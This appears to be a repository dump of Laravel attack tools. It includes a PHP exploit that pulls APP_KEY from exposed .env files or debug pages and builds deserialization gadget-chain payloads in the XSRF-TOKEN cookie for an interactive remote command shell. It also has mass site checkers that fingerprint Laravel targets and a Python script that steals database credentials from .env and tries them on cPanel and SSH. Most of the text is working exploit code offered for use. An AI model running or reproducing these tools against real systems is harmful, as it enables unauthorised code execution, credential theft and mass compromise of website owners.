'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:25:"Illuminate\Bus\Dispatcher":1:{s:16:"' . "\x00" . '*' . "\x00" . 'queueResolver";a:2:{i:0;O:25:"Mockery\Loader\EvalLoader":0:{}i:1;s:4:"load";}}s:8:"' . "\x00" . '*' . "\x00" . 'event";O:38:"Illuminate\Broadcasting\BroadcastEvent":1:{s:10:"connection";O:32:"Mockery\Generator\MockDefinition":2:{s:9:"' . "\x00" . '*' . "\x00" . 'config";O:35:"Mockery\Generator\MockConfiguration":1:{s:7:"' . "\x00" . '*' . "\x00" . 'name";s:7:"abcdefg";}s:7:"' . "\x00" . '*' . "\x00" . 'code";s:'. strlen($p) . ':"' . $p . '";}}}'; 56 | break; 57 | case 6: 58 | $payload = 'O:29:"Illuminate\Support\MessageBag":2:{s:11:"' . "\x00" . '*' . "\x00" . 'messages";a:0:{}s:9:"' . 
"\x00" . '*' . "\x00" . 'format";O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:25:"Illuminate\Bus\Dispatcher":1:{s:16:"' . "\x00" . '*' . "\x00" . 'queueResolver";a:2:{i:0;O:25:"Mockery\Loader\EvalLoader":0:{}i:1;s:4:"load";}}s:8:"' . "\x00" . '*' . "\x00" . 'event";O:38:"Illuminate\Broadcasting\BroadcastEvent":1:{s:10:"connection";O:32:"Mockery\Generator\MockDefinition":2:{s:9:"' . "\x00" . '*' . "\x00" . 'config";O:35:"Mockery\Generator\MockConfiguration":1:{s:7:"' . "\x00" . '*' . "\x00" . 'name";s:7:"abcdefg";}s:7:"' . "\x00" . '*' . "\x00" . 'code";s:' . strlen($p) . ':"' . $p . '";}}}}'; 59 | break; 60 | } 61 | return base64_encode($payload); 62 | } 63 | } 64 | 65 | class Requester 66 | { 67 | 68 | public function Requests($url, $postdata = null, $headers = null, $follow = true) 69 | { 70 | $ch = curl_init(); 71 | curl_setopt($ch, CURLOPT_URL, $url); 72 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 73 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); 74 | curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 75 | curl_setopt($ch, CURLOPT_HEADER, 1); 76 | if (!empty($headers) && $headers != null) 77 | { 78 | curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); 79 | } 80 | if (!empty($postdata) && $postdata != null) 81 | { 82 | curl_setopt($ch, CURLOPT_POST, 1); 83 | curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); 84 | } 85 | if ($follow) 86 | { 87 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 88 | } 89 | $data = curl_exec($ch); 90 | $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); 91 | $status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); 92 | $head = substr($data, 0, $header_size); 93 | $body = substr($data, $header_size); 94 | return json_decode(json_encode(array( 95 | 'status_code' => $status_code, 96 | 'headers' => $this->HeadersToArray($head) , 97 | 'body' => $body 98 | ))); 99 | } 100 | public function HeadersToArray($str) 101 | { 102 | $str = explode("\r\n", $str); 103 | $str = array_splice($str, 0, count($str) 
- 1); 104 | $output = []; 105 | foreach ($str as $item) 106 | { 107 | if ($item === '' || empty($item)) continue; 108 | $index = stripos($item, ": "); 109 | $key = substr($item, 0, $index); 110 | $key = strtolower(str_replace('-', '_', $key)); 111 | $value = substr($item, $index + 2); 112 | if (@$output[$key]) 113 | { 114 | if (strtolower($key) === 'set_cookie') 115 | { 116 | $output[$key] = $output[$key] . "; " . $value; 117 | } 118 | else 119 | { 120 | $output[$key] = $output[$key]; 121 | } 122 | } 123 | else 124 | { 125 | $output[$key] = $value; 126 | } 127 | } 128 | return $output; 129 | } 130 | } 131 | 132 | class Exploit extends Requester 133 | { 134 | public $url; 135 | public $vuln; 136 | public $app_key; 137 | public function __construct($url) 138 | { 139 | $this->url = $url; 140 | $this->vuln = null; 141 | $this->app_key = null; 142 | } 143 | public function getAppKeyEnv() 144 | { 145 | $req = parent::Requests($this->url . "/.env", null, null, $follow = false); 146 | if (preg_match('/APP_KEY/', $req->body)) 147 | { 148 | preg_match_all('/APP_KEY=([a-zA-Z0-9:;\/\\=$%^&*()-+_!@#]+)/', $req->body, $matches, PREG_SET_ORDER, 0); 149 | $this->app_key = $matches[0][1]; 150 | } 151 | } 152 | public function getAppKey() 153 | { 154 | $req = parent::Requests($this->url, 'a=a', null, false); 155 | if (preg_match('/APP_KEY<\/td>/', $req->body)) 156 | { 157 | preg_match_all('/APP_KEY<\/td>\s+(.*?)<\/span>/', $req->body, $matches, PREG_SET_ORDER, 0); 158 | $this->app_key = $matches[0][1]; 159 | } 160 | else 161 | { 162 | $this->getAppKeyEnv($this->url); 163 | } 164 | } 165 | } 166 | function Help() { 167 | echo " 168 | url=URL // Target Required 169 | Optionals: 170 | key=APP_KEY // Setting app key if u have 171 | function=system // Function ex : system, passthru 172 | method=1 // method 1 - 4 Required function parameter, 5 - 6 ( Eval mode ) 173 | ". 
PHP_EOL; 174 | } 175 | parse_str(implode("&", array_slice($argv, 1)), $_GET); 176 | if (!$_GET['url']) return Help(); 177 | $urls = $_GET['url']; 178 | $Req = new Requester(); 179 | $wibu = new Exploit($urls); 180 | $Func = new Func_(); 181 | $function = 'system'; 182 | $method = 1; 183 | if ($_GET['key']) { 184 | $wibu->app_key = $_GET['key']; 185 | } else { 186 | $wibu->getAppKey(); 187 | } 188 | if ($_GET['function']) { 189 | $function = $_GET['function']; 190 | } 191 | if ($_GET['method']) { 192 | $method = $_GET['method']; 193 | } 194 | if ($wibu->app_key != null) 195 | { 196 | while (true) 197 | { 198 | $cmd = readline('Command ~> '); 199 | $app = str_replace('base64:', '', $wibu->app_key); 200 | $command = $Func->GeneratePayload($cmd, $function, $method); 201 | $serialize = $Func->Serialize($app, $command); 202 | $header = array( 203 | 'Cookie: XSRF-TOKEN=' . $serialize 204 | ); 205 | $bre = $Req->Requests($urls,null, $header, false); 206 | $res = explode('', $bre->body)[1]; 207 | echo ($res) ? $res . PHP_EOL : 'Empty Response' . PHP_EOL; 208 | } 209 | } 210 | else 211 | { 212 | echo $urls . " ===> Cannot get APP_KEY!" . 
PHP_EOL; 213 | } 214 | -------------------------------------------------------------------------------- /laravel-sitecheck.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Mass Laravel Site Checker 3 | # Created By Im-Hanzou 4 | # Using GNU Parallel 5 | # Usage: bash file.sh list.txt thread 6 | 7 | yellow='\033[0;33m' 8 | cat << "EOF" 9 | _ _ 10 | | | __ _ _ _ __ _ __ __ ___ | | 11 | | |__ / _` || '_|/ _` |\ V // -_)| | 12 | |____|\__,_||_| \__,_| \_/ \___||_| 13 | 14 | EOF 15 | printf "${yellow}Mass Laravel Site Checker\nGithub : im-hanzou\nUsage: bash file.sh list.txt thread\nExample: bash laravel-sitecheck.sh list.txt 50\n\n\n" 16 | 17 | exploit(){ 18 | classic='\033[0m' 19 | red='\e[41m' 20 | green='\e[42m' 21 | target=$1 22 | thread=$2 23 | 24 | if [[ $(curl --silent --connect-timeout 10 --max-time 10 --insecure -o /dev/null -c - $target ) =~ 'XSRF-TOKEN' || $(curl --silent --connect-timeout 10 --max-time 10 --insecure -o /dev/null -c - $target ) =~ '_session' ]]; 25 | then 26 | printf "${green}[ Valid ]${classic} => [ $target | Laravel Site ] \n"; 27 | printf "$target\n" >> laravel.txt 28 | else 29 | printf "${red}[ Not Valid ]${classic} => $target \n"; 30 | printf "$target\n" >> notlaravel.txt 31 | fi 32 | } 33 | 34 | export -f exploit 35 | parallel --no-notice -j $2 exploit :::: $1 36 | 37 | printf "\033[0;36mLaravel Site : laravel.txt\n"; 38 | printf "\033[0;36mNot Laravel Site : notlaravel.txt\n"; 39 | -------------------------------------------------------------------------------- /laravel-sitechecker.php: -------------------------------------------------------------------------------- 1 | TRUE)); 44 | // Sorry i forgot xD 45 | // if(preg_match_all("/_session/", $cookies)){ 46 | // $lines = file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); 47 | // if (!in_array($url, $lines)) { 48 | // file_put_contents($file, $url . 
PHP_EOL, FILE_APPEND | LOCK_EX); 49 | // } 50 | // return json_encode(array("laravel" => TRUE)); 51 | 52 | // }if(preg_match_all("/XSRF-TOKEN/", $cookies)){ 53 | // $lines = file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); 54 | // if (!in_array($url, $lines)) { 55 | // file_put_contents($file, $url . PHP_EOL, FILE_APPEND | LOCK_EX); 56 | // } 57 | // return json_encode(array("laravel" => TRUE)); 58 | 59 | }else{ 60 | if (!file_exists('invalid_laravel.txt')) { 61 | touch('invalid_laravel.txt'); 62 | } 63 | $lines = file('invalid_laravel.txt', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); 64 | if (!in_array($url, $lines)) { 65 | file_put_contents('invalid_laravel.txt', $url . PHP_EOL, FILE_APPEND | LOCK_EX); 66 | } 67 | return json_encode(array("laravel" => FALSE)); 68 | } 69 | } 70 | 71 | echo "Laravel Site Checker".PHP_EOL; 72 | echo "Created By : Speciment ID".PHP_EOL; 73 | echo "Fixed By : IM-Hanzou".PHP_EOL; 74 | echo PHP_EOL; 75 | echo "Input Sitelist : "; 76 | $list = file_get_contents(trim(fgets(STDIN))); 77 | echo "Valid Result Filename : "; 78 | $output = trim(fgets(STDIN)); 79 | if (!file_exists($output)) { 80 | touch($output); 81 | } 82 | $exp = explode(PHP_EOL, trim($list)); 83 | echo "Invalid Result Filename : invalid_laravel.txt".PHP_EOL; 84 | 85 | $i = 1; 86 | foreach($exp as $site){ 87 | echo $i.". ".$site." 
: ".checker($site, $output).PHP_EOL; 88 | $i++; 89 | } 90 | echo "\nResult saved in $output \n".PHP_EOL; 91 | -------------------------------------------------------------------------------- /laravel-sitechecker.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # Mass Laravel Site Checker 3 | # Created By Im-Hanzou 4 | # Using threading for multi-worker 5 | # Usage: python laravel-sitechecker.py list.txt thread 6 | 7 | import sys 8 | import threading 9 | import requests 10 | import urllib3 11 | from colorama import Fore, Style 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | 14 | print(Fore.CYAN + r""" 15 | _ _ 16 | | | __ _ _ _ __ _ __ __ ___ | | 17 | | |__ / _` || '_|/ _` |\ V // -_)| | 18 | |____|\__,_||_| \__,_| \_/ \___||_| 19 | 20 | """) 21 | print(Fore.YELLOW + "Mass Laravel Site Checker\nGithub: im-hanzou\nUsage: python laravel-sitechecker.py list.txt thread\nExample: python laravel-sitecheck.py list.txt 50\n\n") 22 | Style.RESET_ALL 23 | def exploit(target): 24 | try: 25 | classic = Style.RESET_ALL 26 | result = requests.get(target, timeout=10, verify=False) 27 | if 'XSRF-TOKEN' in result.cookies or '_session' in result.cookies: 28 | print(Fore.GREEN + "[ Valid ]" + classic + " => [ " + target + " | Laravel Site ]") 29 | with open('laravel.txt', 'a') as f: 30 | f.write(target + '\n') 31 | else: 32 | print(Fore.RED + "[ Not Valid ]" + classic + " => " + target) 33 | with open('notlaravel.txt', 'a') as f: 34 | f.write(target + '\n') 35 | except requests.exceptions.Timeout: 36 | print(Fore.RED + "[ Timeout ]" + classic + " => " + target) 37 | except requests.exceptions.RequestException: 38 | print(Fore.RED + "[ Connection Error ]" + classic + " => " + target) 39 | except: 40 | pass 41 | 42 | if __name__ == "__main__": 43 | if len(sys.argv) != 3: 44 | print("Usage: python laravel-sitechecker.py list.txt thread") 45 | sys.exit(1) 46 | 47 | target_file = sys.argv[1] 48 
| num_threads = int(sys.argv[2]) 49 | 50 | targets = [] 51 | with open(target_file, 'r') as f: 52 | targets = f.read().splitlines() 53 | 54 | threads = [] 55 | for target in targets: 56 | t = threading.Thread(target=exploit, args=(target,)) 57 | threads.append(t) 58 | t.start() 59 | 60 | for thread in threads: 61 | thread.join() 62 | 63 | laravel_file = 'laravel.txt' 64 | notlaravel_file = 'notlaravel.txt' 65 | 66 | with open(laravel_file, 'r') as f: 67 | laravel_lines = len(f.readlines()) 68 | 69 | with open(notlaravel_file, 'r') as f: 70 | notlaravel_lines = len(f.readlines()) 71 | 72 | print(Fore.CYAN + f"Laravel Site: {laravel_file} ({laravel_lines} lines)") 73 | print(Fore.CYAN + f"Not Laravel Site: {notlaravel_file} ({notlaravel_lines} lines)") 74 | -------------------------------------------------------------------------------- /laravel-smtp-ssh-cpanel-v2.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import paramiko 4 | import socket 5 | from requests.exceptions import * 6 | from colorama import init, Fore 7 | from concurrent.futures import ThreadPoolExecutor 8 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 9 | 10 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 11 | init(autoreset=True) 12 | 13 | class Laravel(object): 14 | def __init__(self, url): 15 | self.url = url.rstrip('/') 16 | self.body = None 17 | self.headers = None 18 | self.smtp = None 19 | self.ssh = None 20 | self.cpanel = None 21 | self.user = None 22 | self.paswd = None 23 | self.ip = None 24 | 25 | def checkEnv(self): 26 | try: 27 | req = requests.get(self.url + "/.env", verify=False) 28 | if req.status_code == 200 and "APP_ENV" in req.text: 29 | res = req.text.replace("\n", "##") 30 | bro = re.findall(r"DB_USERNAME=(.*?)##", res)[0] 31 | bros = re.findall(r"DB_PASSWORD=(.*?)##", res)[0] 32 | if "_" in bro: 33 | self.user = bro.split("_")[0] 34 | else: 35 | self.user = 
bro 36 | bross = self.url.split("/") 37 | self.ip = socket.gethostbyname(bross[2]) 38 | self.paswd = bros 39 | self.body = req.text 40 | self.headers = req.headers 41 | return True 42 | return False 43 | except (ConnectionError, Exception): 44 | return False 45 | 46 | def loginCpanel(self): 47 | url = self.url.split("/") 48 | datas = { 49 | "user": self.user, 50 | "pass": self.paswd, 51 | "goto": "/" 52 | } 53 | try: 54 | req = requests.post(url[0] + "//" + url[2] + ":2082/login/?login_only=1", data=datas, verify=False) 55 | if "redirect" in req.text and "security_token" in req.text: 56 | self.cpanel = self.url + "|" + self.user + "|" + self.paswd 57 | return True 58 | return False 59 | except Exception as e: 60 | return False 61 | 62 | def loginSSH(self): 63 | try: 64 | ssh = paramiko.SSHClient() 65 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 66 | ssh.connect(self.ip, port=22, username=self.user, password=self.paswd, timeout=10) 67 | self.ssh = self.ip + "|" + self.user + "|" + self.paswd 68 | return True 69 | except (paramiko.ssh_exception.AuthenticationException, Exception): 70 | return False 71 | 72 | def checkCpanel(self): 73 | try: 74 | req = requests.get(self.url + "/cpanel", verify=False) 75 | if req.status_code == 200 and " 3 | - ubuntu/debian
# sudo apt-get install parallel -y
- centos
# sudo yum install parallel -y

4 | Windows :
5 | You can install WSL (Windows Subsystem for Linux), then install Parallel the same way as on Linux.

* If you want to use Windows without installing WSL, install
GitBash, then run: 6 |
# curl pi.dk/3/ > install.sh
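# sha1sum install.sh | grep 12345678
# md5sum install.sh
# sha512sum install.sh
Note: `grep 12345678` matches only a short fragment of the SHA-1 output, and the md5sum and sha512sum lines print a hash without comparing it to anything. `curl pi.dk/3/` gives no scheme, and curl then defaults to plain HTTP, so the download itself is unauthenticated. Before running the next line, compare the full hashes with the values published in the GNU Parallel documentation, obtained over HTTPS (for example `sha512sum install.sh | grep <PUBLISHED_SHA512>`).
# bash install.sh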

7 | --------------------------------------------------------------------------------